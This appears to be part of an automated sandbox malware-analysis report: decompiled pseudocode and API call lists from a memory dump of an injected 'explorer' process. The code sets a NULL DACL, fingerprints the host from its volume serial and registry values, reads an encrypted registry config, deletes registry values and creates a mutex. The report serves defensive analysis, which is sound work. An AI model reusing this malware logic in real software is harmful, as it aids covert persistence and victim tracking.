    						asm("sbb eax, eax");
    						if( ~( ~_t50) == 0) {
    							L5:
    							LocalFree(_v20);
    							_v20 = 0xffffffff;
    						} else {
    							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
    							asm("sbb eax, eax");
    							if( ~( ~_t59) == 0) {
    								goto L5;
    							}
    						}
    					}
    					if(_v8 != 0) {
    						 *_v8 = 0xc;
    						 *(_v8 + 4) = _v12;
    						 *((intOrPtr*)(_v8 + 8)) = 0;
    					}
    					_v16 = _v20;
    				}
    				return _v16;
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0077441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00774437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00771CB4,00000001,?,00000000), ref: 00774453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774498
    • LocalFree.KERNEL32(?), ref: 007744AC
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 64%
    			E00774406(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
    				intOrPtr* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				struct _ACL* _v16;
    				void* _v20;
    				int _v24;
    				int _v28;
    				struct _ACL* _v32;
    				intOrPtr _t37;
    				signed int _t38;
    				signed int _t50;
    				signed int _t59;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0;
    				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
    					_t37 =  *0x77a0d4; // 0x771cb4
    					_t38 =  *0x77b32c(_t37, 1,  &_v20, 0); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t38) == 0) {
    						_v20 = 0xffffffff;
    					} else {
    						_v32 = 0;
    						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
    						asm("sbb eax, eax");
    						if( ~( ~_t50) == 0) {
    							L6:
    							LocalFree(_v20);
    							_v20 = 0xffffffff;
    						} else {
    							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
    							asm("sbb eax, eax");
    							if( ~( ~_t59) == 0) {
    								goto L6;
    							}
    						}
    					}
    					if(_v8 != 0) {
    						 *_v8 = 0xc;
    						 *(_v8 + 4) = _v12;
    						 *((intOrPtr*)(_v8 + 8)) = 0;
    					}
    					_v16 = _v20;
    				}
    				return _v16;
    			}

    APIs
    • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0077441F
    • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00774437
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00771CB4,00000001,?,00000000), ref: 00774453
    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774478
    • SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00774498
    • LocalFree.KERNEL32(?), ref: 007744AC
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 94%
    			E00777A44(void* __ecx) {
    				int _v8;
    				int _v12;
    				void* _v16;
    				char _v20;
    				char _v24;
    				intOrPtr _v28;
    				char _v1053;
    				char _v1074;
    				int _t44;
    				int _t51;
    				void* _t91;
    
    				_t91 = __ecx;
    				_v8 = 0;
    				 *0x77b00c = 0;
    				GetModuleFileNameA(0,  &_v1053, 0x401);
    				E007748DC( &_v1053, _t91, 0x77b00c);
    				_t44 = GetFileVersionInfoSizeA( &_v1053,  &_v12); // executed
    				_v12 = _t44;
    				if(_v12 != 0) {
    					_v16 = E007713DC(_v12);
    					_t51 = GetFileVersionInfoA( &_v1053, _v8, _v12, _v16); // executed
    					if(_t51 != 0) {
    						_v24 = 0x34;
    						 *0x77b298(_v16, E00777BFC,  &_v20,  &_v24);
    						_v28 = _v20;
    						E0077133C("explorer 10.0.10586.104", 0x777c00);
    						E00771864(E00771884( *(_v28 + 0x10)) & 0x0000ffff,  &_v1074);
    						E0077133C("explorer 10.0.10586.104",  &_v1074);
    						E0077133C("explorer 10.0.10586.104", 0x777c04);
    						E00771864( *(_v28 + 0x10) & 0x0000ffff,  &_v1074);
    						E0077133C("explorer 10.0.10586.104",  &_v1074);
    						E0077133C("explorer 10.0.10586.104", 0x777c04);
    						E00771864(E00771884( *(_v28 + 0x14)) & 0x0000ffff,  &_v1074);
    						E0077133C("explorer 10.0.10586.104",  &_v1074);
    						E0077133C("explorer 10.0.10586.104", 0x777c04);
    						E00771864( *(_v28 + 0x14) & 0x0000ffff,  &_v1074);
    						E0077133C("explorer 10.0.10586.104",  &_v1074);
    					}
    					return E00771440(_v16);
    				}
    				return _t44;
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 00777A67
    • GetFileVersionInfoSizeA.KERNELBASE(?,?), ref: 00777A88
      • Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
      • Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2
    • GetFileVersionInfoA.KERNELBASE(?,?,00000000,?), ref: 00777AB9
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
      • Part of subcall function 00771864: wsprintfA.USER32 ref: 00771874
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E007747AC(CHAR* __eax, void** __edx) {
    				CHAR* _v8;
    				void** _v12;
    				long _v16;
    				void* _v20;
    				long _v24;
    				long _v28;
    				void* _t27;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0xffffffff;
    				 *_v12 = 0;
    				_t27 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_v20 = _t27;
    				if(_v20 == 0xffffffff) {
    					_v20 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v20 != 0xffffffff) {
    					_v24 = GetFileSize(_v20, 0);
    					if(_v24 != 0) {
    						E007713B4(_v12, _v24 + 1); // executed
    						ReadFile(_v20,  *_v12, _v24,  &_v28, 0); // executed
    						CloseHandle(_v20);
    						_v16 = _v24;
    					}
    				}
    				return _v16;
    			}

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007747D9
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007747FB
    • GetFileSize.KERNEL32(?,00000000), ref: 00774810
      • Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD
    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0077483F
    • CloseHandle.KERNEL32(?), ref: 00774849
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00774BA0(intOrPtr* __eax) {
    				intOrPtr* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				long _v24;
    				long _v28;
    				signed int _v32;
    				void* _v36;
    				void* _v40;
    				signed int _v41;
    				char _v298;
    				char* _t78;
    				intOrPtr _t82;
    				void* _t84;
    				intOrPtr _t87;
    				void* _t89;
    				intOrPtr _t92;
    				void* _t94;
    				intOrPtr _t98;
    				CHAR* _t109;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x101;
    				if(GetComputerNameA( &_v298,  &_v12) != 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
    				}
    				_t78 =  *0x77a25c; // 0x772174
    				RegOpenKeyExA(0x80000002, _t78, 0, 0x20119,  &_v36); // executed
    				_v12 = 0x101;
    				_t82 =  *0x77a0e4; // 0x771d14
    				_t84 = E007738B0(_v36, _t82, 0, 0,  &_v298,  &_v12); // executed
    				if(_t84 == 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t87 =  *0x77a0e8; // 0x771d20
    				_t89 = E007738B0(_v36, _t87, 0, 0,  &_v298,  &_v12); // executed
    				if(_t89 == 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t92 =  *0x77a0ec; // 0x771d2c
    				_t94 = E007738B0(_v36, _t92, 0, 0,  &_v298,  &_v12); // executed
    				if(_t94 == 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
    				}
    				_v12 = 4;
    				_v20 = 0;
    				_t98 =  *0x77a0f0; // 0x771d3c
    				E007738B0(_v36, _t98, 0, 0,  &_v20,  &_v12); // executed
    				E00773890(_v36);
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_t109 =  *0x77a268; // 0x7721d0
    				GetVolumeInformationA(_t109, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0); // executed
    				_v32 = _v20 ^ _v28 ^ _v24;
    				E00771164(_v32,  &_v298);
    				E00771308(_v8,  &_v298);
    				E00771164(_v16,  &_v298);
    				E0077133C(_v8,  &_v298);
    				_v40 = _v8;
    				_v41 = 0;
    				while( *_v40 != 0) {
    					_v41 = _v41 ^ E0077118C( *_v40);
    					_v40 = _v40 + 2;
    				}
    				E00771164(_v41,  &_v298);
    				return E0077133C(_v8,  &(( &_v298)[6]));
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 00774BC3
    • RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00774C01
      • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
    • GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00774D40
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00774B9B(intOrPtr* __eax, void* __edx, intOrPtr _a122) {
    				intOrPtr* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				long _v24;
    				long _v28;
    				signed int _v32;
    				void* _v36;
    				void* _v40;
    				signed int _v41;
    				char _v298;
    				char* _t80;
    				intOrPtr _t84;
    				void* _t86;
    				intOrPtr _t89;
    				void* _t91;
    				intOrPtr _t94;
    				void* _t96;
    				intOrPtr _t100;
    				CHAR* _t111;
    
    				_a122 = _a122 + __edx;
    				 *__eax =  *__eax + __eax;
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x101;
    				if(GetComputerNameA( &_v298,  &_v12) != 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
    				}
    				_t80 =  *0x77a25c; // 0x772174
    				RegOpenKeyExA(0x80000002, _t80, 0, 0x20119,  &_v36); // executed
    				_v12 = 0x101;
    				_t84 =  *0x77a0e4; // 0x771d14
    				_t86 = E007738B0(_v36, _t84, 0, 0,  &_v298,  &_v12); // executed
    				if(_t86 == 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t89 =  *0x77a0e8; // 0x771d20
    				_t91 = E007738B0(_v36, _t89, 0, 0,  &_v298,  &_v12); // executed
    				if(_t91 == 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t94 =  *0x77a0ec; // 0x771d2c
    				_t96 = E007738B0(_v36, _t94, 0, 0,  &_v298,  &_v12); // executed
    				if(_t96 == 0) {
    					_v16 = E00771BA8(_v16, E007712DC( &_v298),  &_v298);
    				}
    				_v12 = 4;
    				_v20 = 0;
    				_t100 =  *0x77a0f0; // 0x771d3c
    				E007738B0(_v36, _t100, 0, 0,  &_v20,  &_v12); // executed
    				E00773890(_v36);
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_t111 =  *0x77a268; // 0x7721d0
    				GetVolumeInformationA(_t111, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0); // executed
    				_v32 = _v20 ^ _v28 ^ _v24;
    				E00771164(_v32,  &_v298);
    				E00771308(_v8,  &_v298);
    				E00771164(_v16,  &_v298);
    				E0077133C(_v8,  &_v298);
    				_v40 = _v8;
    				_v41 = 0;
    				while( *_v40 != 0) {
    					_v41 = _v41 ^ E0077118C( *_v40);
    					_v40 = _v40 + 2;
    				}
    				E00771164(_v41,  &_v298);
    				return E0077133C(_v8,  &(( &_v298)[6]));
    			}

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 00774BC3
    • RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00774C01
      • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
    • GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00774D40
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00778BF8(intOrPtr* __eax, void* __edx) {
    				void* _v4;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				char _v20;
    				intOrPtr _v117;
    				char _v273;
    				char _v277;
    				char* _t29;
    				intOrPtr _t34;
    				void* _t36;
    				intOrPtr _t40;
    				short _t55;
    
    				 *__eax =  *__eax + __eax;
    				_v117 = _v117 + __edx;
    				_t29 =  *0x77a25c; // 0x772174
    				RegOpenKeyExA(0x80000002, _t29, 0, 0x20119,  &_v4); // executed
    				_v8 = 0;
    				_v16 = 0x101;
    				_t34 =  *0x77a0e4; // 0x771d14
    				_t36 = E007738B0(_v4, _t34, 0, 0,  &_v273,  &_v16); // executed
    				if(_t36 == 0) {
    					_v12 = E00771BA8(_v12, E007712DC( &_v277),  &_v277);
    				}
    				_v20 = 4;
    				_v16 = 0;
    				_t40 =  *0x77a0f0; // 0x771d3c
    				E007738B0(_v8, _t40, 0, 0,  &_v16,  &_v20); // executed
    				E00773890(_v8);
    				 *0x77a03c = _v12;
    				 *0x77a040 = _v16;
    				 *0x77a044 = _v12 ^ _v16 ^ 0xaf15f9fc;
    				 *0x77a048 = _v12 ^ 0xbf2bf9fd;
    				 *0x77a04c = _v12;
    				 *0x77a04e = E00771884(_v12);
    				_t55 = _v16;
    				 *0x77a050 = _t55;
    				return _t55;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00778C1B
      • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00778BFC() {
    				void* _v8;
    				signed int _v12;
    				signed int _v16;
    				char _v20;
    				char _v277;
    				char* _t26;
    				intOrPtr _t31;
    				void* _t33;
    				intOrPtr _t37;
    				short _t52;
    
    				_t26 =  *0x77a25c; // 0x772174
    				RegOpenKeyExA(0x80000002, _t26, 0, 0x20119,  &_v8); // executed
    				_v12 = 0;
    				_v20 = 0x101;
    				_t31 =  *0x77a0e4; // 0x771d14
    				_t33 = E007738B0(_v8, _t31, 0, 0,  &_v277,  &_v20); // executed
    				if(_t33 == 0) {
    					_v12 = E00771BA8(_v12, E007712DC( &_v277),  &_v277);
    				}
    				_v20 = 4;
    				_v16 = 0;
    				_t37 =  *0x77a0f0; // 0x771d3c
    				E007738B0(_v8, _t37, 0, 0,  &_v16,  &_v20); // executed
    				E00773890(_v8);
    				 *0x77a03c = _v12;
    				 *0x77a040 = _v16;
    				 *0x77a044 = _v12 ^ _v16 ^ 0xaf15f9fc;
    				 *0x77a048 = _v12 ^ 0xbf2bf9fd;
    				 *0x77a04c = _v12;
    				 *0x77a04e = E00771884(_v12);
    				_t52 = _v16;
    				 *0x77a050 = _t52;
    				return _t52;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,00772174,00000000,00020119,?), ref: 00778C1B
      • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00777304(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char* _t41;
    				char* _t78;
    				long _t79;
    
    				_v8 = __eax;
    				_v12 = 0;
    				if( *0x77a034 == 0) {
    					_t41 =  *0x77a260; // 0x7721a4
    					_v20 = RegOpenKeyExA(0x80000001, _t41, 0, 0xf003f,  &_v16);
    				} else {
    					_t78 =  *0x77a260; // 0x7721a4
    					_t79 = RegOpenKeyExA(0x80000002, _t78, 0, 0xf003f,  &_v16); // executed
    					_v20 = _t79;
    				}
    				if(_v20 == 0) {
    					_v28 = 0;
    					if(E007738B0(_v16, 0, 0, 0, 0,  &_v28) == 0 && _v28 > 0) {
    						_v24 = E007713DC(_v28);
    						_v36 = _v28;
    						_v32 = E007713DC(_v36);
    						E007738B0(_v16, 0, 0, 0, _v24,  &_v28);
    						E007759BC(_v24, 0x77a03c, _v28,  &_v36, _v32);
    						if(_v36 == 0x188) {
    							E007772C4(_v32);
    							_v40 = _v32;
    							if( *((intOrPtr*)(_v40 + 0x11d)) == 0 &&  *((intOrPtr*)(_v40 + 0x121)) == 0) {
    								E007712B8(_v8, 0x188, _v32);
    								_v12 = 0xffffffff;
    							}
    						}
    						E00771440(_v24);
    						E00771440(_v32);
    					}
    					E00773890(_v16);
    				}
    				return _v12;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(80000002,007721A4,00000000,000F003F,?), ref: 00777331
    • RegOpenKeyExA.ADVAPI32(80000001,007721A4,00000000,000F003F,?), ref: 00777352
      • Part of subcall function 007738B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
      • Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
      • Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
      • Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
      • Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 88%
    			E00778064(void* __eax, char* __ecx, char* __edx) {
    				void* _v8;
    				char* _v12;
    				char* _v16;
    				signed char _v20;
    				void* _v24;
    				long _t20;
    				signed int _t24;
    
    				_v16 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				_v20 = 0;
    				_t20 = RegOpenKeyExA(_v8, _v12, 0, 0xf003f,  &_v24); // executed
    				if(_t20 == 0) {
    					_t24 = RegDeleteValueA(_v24, _v16);
    					asm("sbb eax, eax");
    					_v20 =  ~(_t24 & 0xffffff00 | _t24 == 0x00000000);
    					E00773890(_v24);
    				}
    				return _v20;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 0077808B
    • RegDeleteValueA.ADVAPI32(?,?), ref: 0077809D
      • Part of subcall function 00773890: RegCloseKey.ADVAPI32(?), ref: 0077389D
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 50%
    			E00778B98(intOrPtr __eax) {
    				intOrPtr _v8;
    				intOrPtr _t16;
    				void* _t19;
    
    				_v8 = __eax;
    				_t23 =  *0x77a034;
    				if( *0x77a034 == 0) {
    					 *0x77b21c(0, _v8, 0x1a, 0xffffffff);
    					E0077133C(_v8, E00778BF8);
    				} else {
    					 *0x77b21c(0, _v8, 0x26, 0xffffffff);
    					_t16 =  *0x77a090; // 0x771c10
    					E0077133C(_v8, _t16);
    				}
    				return E00777560(_v8, _t19, _t23);
    			}

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00778BB2
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00778BD6
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 25%
    			E0077453C(void* __eax) {
    				void* _v8;
    				char _v9;
    				signed int _v16;
    				void* _t16;
    
    				_v8 = __eax;
    				_v9 = 0;
    				if(_v8 == 0 || _v8 == 0xffffffff) {
    					_v8 = GetCurrentProcess();
    				}
    				if( *0x77b250 != 0) {
    					_t16 =  *0x77b250(_v8,  &_v16); // executed
    					if(_t16 != 0) {
    						asm("sbb eax, eax");
    						_v9 =  ~( ~_v16);
    					}
    				}
    				return _v9;
    			}

    APIs
    • GetCurrentProcess.KERNEL32 ref: 00774555
    • IsWow64Process.KERNELBASE(00000000,?), ref: 0077456F
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00778B6C() {
    				long _v8;
    				void* _t5;
    
    				_t5 = CreateThread(0, 0, E00778AA4, 0, 0,  &_v8); // executed
    				_v8 = _t5;
    				return CloseHandle(_v8);
    			}

    APIs
    • CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 00778B81
    • CloseHandle.KERNEL32(?), ref: 00778B8E
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007789D2() {
    				long _v8;
    				char _v17;
    				long _v24;
    				long _v28;
    				CHAR* _t16;
    				intOrPtr _t21;
    				intOrPtr _t23;
    				void* _t24;
    
    				_t16 =  *0x77a268; // 0x7721d0
    				GetVolumeInformationA(_t16, 0, 0,  &_v8,  &_v24,  &_v28, 0, 0); // executed
    				_v8 = _v8 ^ 0xc1b5f2f0;
    				E00771164(_v8,  &_v17);
    				_t21 =  *0x77a260; // 0x7721a4
    				E0077133C(_t21,  &_v17);
    				_t23 =  *0x77a260; // 0x7721a4
    				_t24 = E0077133C(_t23, E00778A44);
    				_v8 = _v8 ^ 0xc6b7feb7;
    				_v8 = _v8 ^ 0x183cca04;
    				return _t24;
    			}

    APIs
    • GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007789F4
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007789D4() {
    				long _v8;
    				char _v17;
    				long _v24;
    				long _v28;
    				CHAR* _t16;
    				intOrPtr _t21;
    				intOrPtr _t23;
    				void* _t24;
    
    				_t16 =  *0x77a268; // 0x7721d0
    				GetVolumeInformationA(_t16, 0, 0,  &_v8,  &_v24,  &_v28, 0, 0); // executed
    				_v8 = _v8 ^ 0xc1b5f2f0;
    				E00771164(_v8,  &_v17);
    				_t21 =  *0x77a260; // 0x7721a4
    				E0077133C(_t21,  &_v17);
    				_t23 =  *0x77a260; // 0x7721a4
    				_t24 = E0077133C(_t23, E00778A44);
    				_v8 = _v8 ^ 0xc6b7feb7;
    				_v8 = _v8 ^ 0x183cca04;
    				return _t24;
    			}

    APIs
    • GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007789F4
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00777982() {
    				long _v8;
    				long _v12;
    				CHAR* _t5;
    				int _t6;
    
    				_t5 =  *0x77a268; // 0x7721d0
    				_t6 = GetVolumeInformationA(_t5, 0, 0, 0x77b110,  &_v8,  &_v12, 0, 0); // executed
    				 *0x77b110 =  *0x77b110 ^ 0xf1f1f1f1;
    				return _t6;
    			}

    APIs
    • GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,0077B110,?,?,00000000,00000000), ref: 007779A5
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E007738B0(void* _a4, char* _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
    				long _v8;
    				long _t15;
    
    				_t15 = RegQueryValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
    				_v8 = _t15;
    				return _v8;
    			}

    APIs
    • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00776992,?,00771D3C,00000000,00000000,?,?), ref: 007738CC
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00777984() {
    				long _v8;
    				long _v12;
    				CHAR* _t5;
    				int _t6;
    
    				_t5 =  *0x77a268; // 0x7721d0
    				_t6 = GetVolumeInformationA(_t5, 0, 0, 0x77b110,  &_v8,  &_v12, 0, 0); // executed
    				 *0x77b110 =  *0x77b110 ^ 0xf1f1f1f1;
    				return _t6;
    			}

    APIs
    • GetVolumeInformationA.KERNELBASE(007721D0,00000000,00000000,0077B110,?,?,00000000,00000000), ref: 007779A5
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_770000_explorer.jbxd
    C-Code - Quality: 100%
    			E00779080(intOrPtr _a4) {
    				void* _t10;
    				void* _t11;
    
    				_a4 = _a4 + 4;
    				 *0x77b114 = E0077458C(0);
    				E00772574(0); // executed
    				E00778D0C(_t10, _t11, 0, _a4); // executed
    				ExitProcess(0);
    			}

    APIs
      • Part of subcall function 00778D0C: GetCurrentProcess.KERNEL32 ref: 00778D33
      • Part of subcall function 00778D0C: GetCurrentProcess.KERNEL32 ref: 00778D5D
      • Part of subcall function 00778D0C: GetCurrentProcess.KERNEL32 ref: 00778D77
      • Part of subcall function 00778D0C: LocalAlloc.KERNEL32(00000000,00000014), ref: 00778D94
      • Part of subcall function 00778D0C: CreateMutexA.KERNELBASE(?,00000000,00771CC8), ref: 00778DB4
      • Part of subcall function 00778D0C: LocalFree.KERNEL32(?), ref: 00778DC3
      • Part of subcall function 00778D0C: RtlInitializeCriticalSection.NTDLL(0077BE04), ref: 00778E0C
      • Part of subcall function 00778D0C: Sleep.KERNELBASE(000003E8), ref: 00778FC8
      • Part of subcall function 00778D0C: GetCursorPos.USER32(?), ref: 00779000
      • Part of subcall function 00778D0C: RtlExitUserThread.NTDLL(00000000), ref: 00779069
    • ExitProcess.KERNEL32 ref: 007790A8
    Memory Dump Source
    • Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true
    Joe Sandbox IDA Plugin
